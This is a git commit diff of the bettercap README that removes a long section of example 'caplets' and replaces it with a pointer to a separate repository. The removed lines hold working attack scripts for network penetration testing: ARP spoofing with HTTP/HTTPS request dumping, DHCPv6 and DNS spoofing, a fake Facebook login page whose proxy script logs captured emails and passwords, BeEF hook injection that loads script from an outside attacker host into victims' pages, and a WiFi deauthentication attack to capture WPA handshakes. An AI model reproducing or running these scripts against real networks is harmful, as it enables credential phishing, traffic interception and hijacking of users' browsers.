misc: small fix or general refactoring i did not bother commenting

2025-08-19 04:59:25 -07:00 · 2018-02-23 00:26:19 +01:00 · 2018-02-23 00:26:19 +01:00 · 6b178afc4d
commit 6b178afc4d
parent 147770d2cb
1 changed files with 1 additions and 249 deletions
--- a/README.md
+++ b/README.md
@ -122,255 +122,7 @@ And finally, you can access and use any variable that has been declared in the i
 ## Caplets
-Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.
+Caplets, or `.cap` files are a powerful way to script bettercap's interactive sessions, think about them as the `.rc` files of Metasploit. You will find updated caplets and modules [in this repository](/bettercap/caplets), you're strongly invited to check it out in order to fully understand the features of this tool.
 #### caplets/http-req-dump.cap
 Execute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dumsp.js` proxy script.
 ```sh
 # targeting the whole subnet by default, to make it selective:
 #
 #   sudo ./bettercap -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
 # to make it less verbose
 # events.stream off
 # discover a few hosts 
 net.probe on
 sleep 1
 net.probe off
 # uncomment to enable sniffing too
 # set net.sniff.verbose false
 # set net.sniff.local true
 # set net.sniff.filter tcp port 443
 # net.sniff on
 # we'll use this proxy script to dump requests
 set https.proxy.script caplets/http-req-dump.js
 set http.proxy.script caplets/http-req-dump.js
 clear
 # go ^_^
 http.proxy on
 https.proxy on
 arp.spoof on
 ```
 #### caplets/netmon.cap
 An example of how to use the `ticker` module, use this caplet to monitor activities on your network.
 ```sh
 net.probe on
 clear
 ticker on
 ```
 #### caplets/mitm6.cap
 [Reroute IPv4 DNS requests by using DHCPv6 replies](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/), start a HTTP server and DNS spoofer for `microsoft.com` and `google.com`.
 ```sh
 # let's spoof Microsoft and Google ^_^
 set dns.spoof.domains microsoft.com, google.com
 set dhcp6.spoof.domains microsoft.com, google.com
 # every request http request to the spoofed hosts will come to us
 # let's give em some contents
 set http.server.path caplets/www
 # serve files
 http.server on
 # redirect DNS request by spoofing DHCPv6 packets
 dhcp6.spoof on
 # send spoofed DNS replies ^_^
 dns.spoof on
 # set a custom prompt for ipv6
 set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
 # clear the events buffer and the screen
 events.clear
 clear
 ```
 <center>
    <img src="https://pbs.twimg.com/media/DTXrMJJXcAE-NcQ.jpg:large" width="100%"/>
 </center>
 #### caplets/rest-api.cap
 Start a rest API.
 ```sh
 # change these!
 set api.rest.username bcap
 set api.rest.password bcap
 # set api.rest.port 8082
 # actively probe network for new hosts
 net.probe on
 # enjoy /api/session and /api/events
 api.rest on
 ```
 Get information about the current session:
    curl -k --user bcap:bcap https://bettercap-ip:8083/api/session
 Execute a command in the current interactive session:
    curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
 Get last 50 events:
    curl -k --user bcap:bcap https://bettercap-ip:8083/api/events?n=50
 Clear events:
    curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events
 <center>
    <img src="https://pbs.twimg.com/media/DTAreSCX4AAXX6v.jpg:large" width="100%"/>
 </center>
 #### caplets/fb-phish.cap
 This caplet will create a fake Facebook login page on port 80, intercept login attempts using the `http.proxy`, print credentials and redirect the target to the real Facebook.
 <center>
    <img src="https://pbs.twimg.com/media/DTY39bnXcAAg5jX.jpg:large" width="100%"/>
 </center>
 Make sure to create the folder first:
    $ cd caplets/www/
    $ make
 ```sh
 set http.server.address 0.0.0.0
 set http.server.path caplets/www/www.facebook.com/
 set http.proxy.script caplets/fb-phish.js
 http.proxy on
 http.server on
 ```
 The `caplets/fb-phish.js` proxy script file:
 ```javascript
 function onRequest(req, res) {
    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
        var form = req.ParseForm();
        var email = form["email"] || "?", 
            pass  = form["pass"] || "?";
        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );
        res.Status      = 301;
        res.Headers     = "Location: https://www.facebook.com/\n" +
                          "Connection: close";
    }
 }
 ```
 #### caplets/beef-inject.cap
 Use a proxy script to inject a BEEF javascript hook:
 ```sh
 # targeting the whole subnet by default, to make it selective:
 #
 #   sudo ./bettercap -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"
 # inject beef hook
 set http.proxy.script caplets/beef-inject.js
 # redirect http traffic to a proxy
 http.proxy on
 # wait for everything to start properly
 sleep 1
 # make sure probing is off as it conflicts with arp spoofing
 arp.spoof on
 ```
 The `caplets/beef.inject.js` proxy script file:
 ```javascript
 function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
 }
 function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
        }
    }
 }
 ```
 #### caplets/airmon.cap
 Put a wifi interface in monitor mode and listen for frames in order to detect WiF access points and clients.
 ```
 set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
 set ticker.commands clear; wifi.show
 # uncomment to disable channel hopping
 # set wifi.recon.channel 1
 wifi.recon on
 ticker on
 events.clear
 clear
 ```
 #### caplets/wpa\_handshake.cap
 Use various modules to inject wifi frames performing a deauthentication attack, while a sniffer is waiting for WPA handshakes.
 ```
 # swag prompt for wifi
 set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
 # Sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
 set net.sniff.verbose true
 set net.sniff.filter ether proto 0x888e
 set net.sniff.output wpa.pcap
 net.sniff on
 # since we need to capture the handshake, we can't hop
 # through channels but we need to stick to the one we're
 # interested in otherwise the sniffer might lose packets.
 set wifi.recon.channel 1
 wifi.recon on
 # uncomment to recon clients of a specific AP given its BSSID
 # wifi.recon DE:AD:BE:EF:DE:AD
 events.clear
 clear
 # now just deauth clients and wait ^_^
 #
 # Example:
 #
 # wifi.deauth AP-BSSID-HERE
 #
 # This will deauth every client for this specific access point,
 # you can put it as ticker.commands to have the ticker module
 # periodically deauth clients :D
 ```
 ## License